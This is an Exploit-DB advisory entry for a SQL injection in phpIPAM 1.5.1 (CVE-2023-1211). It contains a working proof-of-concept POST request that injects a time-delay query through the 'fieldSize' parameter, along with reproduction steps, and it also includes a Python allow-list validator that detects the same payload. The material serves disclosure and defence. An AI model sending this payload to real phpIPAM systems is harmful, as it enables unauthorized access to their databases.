[webapps] phpIPAM 1.5.1 - SQL Injection
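This article describes a SQL injection vulnerability in phpIPAM 1.5.1 (CVE-2023-1211), triggered by sending a malicious POST request to `/app/admin/custom-fields/edit-result.php`. The attacker needs a valid session cookie and CSRF token, and uses the `fieldSize` parameter to inject SQL code into the enum field type definition. The vulnerability can lead to disclosure of sensitive data or other malicious actions. 2025-12-2 00:0:0 Author: www.exploit-db.com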

# Exploit Title: phpIPAM 1.5.1 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage:  https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1 
# Tested on: Windows
# CVE : CVE-2023-1211


Proof Of Concept
POST /app/admin/custom-fields/edit-result.php HTTP/1.1
Host: phpipam
Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
Content-Type: application/x-www-form-urlencoded

csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES

**Prerequisites:**
1. Valid authenticated session (PHPSESSID cookie)
2. Valid CSRF token (obtain from `/admin/custom-fields/` page first)
3. Target table must exist (default 'devices' table used)
4. Field type must be enum/set to reach vulnerable code path

**Manual Test Steps:**
1. Log in to phpIPAM
2. Visit `/admin/custom-fields/` to get CSRF token
3. Send POST request with above payload

**Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from authenticated session. The `fieldSize` parameter injects SQL through enum/set type definition context.
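The note above locates the flaw in how `fieldSize` reaches the enum/set type definition, so the defensive counterpart is an allow-list on that parameter. The following is an added example, not code from the advisory or from phpIPAM: it checks POST bodies for this endpoint, and the accepted grammar (comma-separated single-quoted labels for enum/set, a plain length otherwise), the function names and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumed grammar: enum/set sizes are comma-separated single-quoted labels;
# other field types take a plain length such as 32 or 10,2.
LABEL = r"'[A-Za-z0-9 _.-]{1,64}'"
ENUM_VALUES = re.compile(LABEL + r"(?:\s*,\s*" + LABEL + r"){0,63}")
NUMERIC_SIZE = re.compile(r"\d{1,5}(?:,\d{1,2})?")
ENDPOINT = "/app/admin/custom-fields/edit-result.php"


def field_size_is_safe(field_type, field_size):
    """Allow-list check: reject anything outside the expected grammar."""
    if field_type.lower() in ("enum", "set"):
        return ENUM_VALUES.fullmatch(field_size) is not None
    return field_size == "" or NUMERIC_SIZE.fullmatch(field_size) is not None


def review_request(path, body):
    """Return a finding for a suspicious custom-field POST, else None."""
    if path != ENDPOINT:
        return None
    form = parse_qs(body, keep_blank_values=True)  # URL-decodes the values
    field_type = form.get("fieldType", [""])[0]
    field_size = form.get("fieldSize", [""])[0]
    if field_size_is_safe(field_type, field_size):
        return None
    return (f"fieldSize outside allow-list for "
            f"fieldType={field_type!r}: {field_size!r}")


# Constructed sample requests (path, urlencoded body). The second carries
# the fieldSize value from the proof of concept on this page.
SAMPLES = [
    (ENDPOINT, "action=add&name=rack_side&fieldType=enum"
               "&fieldSize=%27front%27%2C%27rear%27&table=devices"),
    (ENDPOINT, "action=add&name=custom_sqli_test&fieldType=enum"
               "&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices"),
    (ENDPOINT, "action=add&name=asset_tag&fieldType=varchar"
               "&fieldSize=32&table=devices"),
]

if __name__ == "__main__":
    for path, body in SAMPLES:
        print(review_request(path, body) or "ok")
```

The same grammar check belongs server-side before the value is placed into the column definition; matching on decoded form fields rather than raw bytes keeps URL-encoding from hiding the payload.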



Steps to Reproduce
1. Log in as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensuring it includes a valid session cookie and CSRF token.
3. Observe the result.

Source: https://www.exploit-db.com/exploits/52444